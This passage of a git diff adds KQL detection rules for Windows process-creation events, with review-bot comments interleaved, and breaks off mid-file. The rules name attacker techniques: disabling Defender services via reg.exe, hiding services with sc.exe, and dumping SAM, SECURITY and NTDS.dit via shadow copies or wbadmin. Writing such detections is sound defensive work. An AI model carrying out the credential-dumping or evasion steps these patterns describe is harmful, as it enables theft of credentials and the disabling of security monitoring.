+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql
new file mode 100644
index 00000000..e4b4bf3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Script Interpreter Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-08
+// Level: high
+// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql
new file mode 100644
index 00000000..00dc8185
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql
@@ -0,0 +1,13 @@
+// Title: Scripting/CommandLine Process Spawned Regsvr32
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
+// - Some legitimate Windows services
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sdclt_child_processes.kql b/KQL/rules/windows/process_creation/sdclt_child_processes.kql
new file mode 100644
index 00000000..c4078c64
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sdclt_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Sdclt Child Processes
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql
new file mode 100644
index 00000000..e078f6f0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Sdiagnhost Calling Suspicious Child Process
+// Author: Nextron Systems, @Kostastsale
+// Date: 2022-06-01
+// Level: high
+// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql
new file mode 100644
index 00000000..6d91c21e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql
@@ -0,0 +1,14 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
+// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
+// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql
new file mode 100644
index 00000000..5d816a7e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql
@@ -0,0 +1,10 @@
+// Title: Security Privileges Enumeration Via Whoami.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-05
+// Level: high
+// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql
new file mode 100644
index 00000000..3bb1cf80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Security Service Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
+// Date: 2021-07-14
+// Level: high
+// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql
new file mode 100644
index 00000000..260b5bc3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql
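Review bot: The where clause anchors only on `ProcessCommandLine contains "reg" and ProcessCommandLine contains "add"` and has no `FolderPath` or `ProcessVersionInfoOriginalFileName` condition, unlike the RunMRU, SafeBoot and MiniNt reg.exe rules in this batch, which all pin the image. That is presumably deliberate, so that `reg add` issued through a cmd or PowerShell wrapper is still caught, but the header does not say so and a maintainer comparing the rules will read it as an omission; a one-line note in the header such as `// Note: matches on command line only (no image check) so that "reg add" issued via shell wrappers is also caught` would settle it. The `"d 4"` / `"v Start"` substrings are also space-sensitive and depend on the `/d 4` and `/v Start` argument spellings, which is worth stating in the same note.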
@@ -0,0 +1,11 @@
+// Title: Security Tools Keyword Lookup Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-10-20
+// Level: medium
+// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
+// This detection focuses on the keywords that the attacker might use as a filter.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
new file mode 100644
index 00000000..8f0f371a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
@@ -0,0 +1,13 @@
+// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-05
+// Level: high
+// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
+// This behavior has been observed in-the-wild by different threat actors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql
new file mode 100644
index 00000000..fdfbdb41
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql
@@ -0,0 +1,12 @@
+// Title: Sensitive File Access Via Volume Shadow Copy Backup
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql
new file mode 100644
index 00000000..da17967d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql
@@ -0,0 +1,13 @@
+// Title: Sensitive File Dump Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..61a5e691
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,11 @@
+// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql
new file mode 100644
index 00000000..c32f37b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service DACL Abuse To Hide Services Via Sc.EXE
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..45f4628f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Service Reconnaissance Via Wmic.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
+// When the test completes, a service information will be displayed on the screen if it exists.
+// A common feedback message is that "No instance(s) Available" if the service queried is not running.
+// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..ad613d73
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..a6c459f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
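Review bot: `FolderPath endswith "reg.exe"` in the Service Registry Key Deleted rule lacks the leading path separator that every sibling rule in this batch uses (`"\\sc.exe"`, `"\\wbadmin.exe"`), so any image whose file name merely ends in the characters `reg.exe` satisfies that branch rather than only the `reg.exe` binary. Change it to `FolderPath endswith "\\reg.exe"` so the match is anchored on the file name like the rest. The missing separator may be carried over from the upstream Sigma source; if so, the converter or the upstream rule is the right place to fix it, since hand-editing this generated file will be overwritten on the next run.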
diff --git a/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql
new file mode 100644
index 00000000..91f18f10
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Service Started/Stopped Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of wmic to start or stop a service
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql
new file mode 100644
index 00000000..fbe44881
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via PowerShell Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-04
+// Level: medium
+// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql
new file mode 100644
index 00000000..d92aec12
--- /dev/null
+++ b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service StartupType Change Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - False positives may occur with troubleshooting scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..30a985e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,10 @@
+// Title: Set Suspicious Files as System Files Using Attrib.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql
new file mode 100644
index 00000000..cf991af5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql
@@ -0,0 +1,14 @@
+// Title: Setup16.EXE Execution With Custom .Lst File
+// Author: frack113
+// Date: 2024-12-01
+// Level: medium
+// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
+// These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
+// Attackers and adversaries might leverage this as a living of the land utility.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005
+// False Positives:
+// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..44af7700
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql
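Review bot: The Setup16 rule hard-codes the `C:` drive in both the parent-image match (`InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe"`) and the exclusion (`FolderPath startswith "C:\\~MSSETUP.T\\"`), so hosts with Windows installed on another volume never match, and on such hosts the exclusion silently does nothing. If the intent is the binary rather than its absolute location, `InitiatingProcessFolderPath endswith "\\SysWOW64\\setup16.exe"` paired with `not(FolderPath contains ":\\~MSSETUP.T\\")` keeps the same meaning without the drive-letter assumption. This probably mirrors the upstream Sigma rule, so it is likely an upstream question rather than a converter defect.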
@@ -0,0 +1,12 @@
+// Title: Shadow Copies Creation Using Operating Systems Utilities
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: medium
+// Description: Shadow Copies creation using operating systems utilities, possible credential access
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..cc930614
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Shadow Copies Deletion Using Operating Systems Utilities
+// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies deletion using operating systems utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490
+// False Positives:
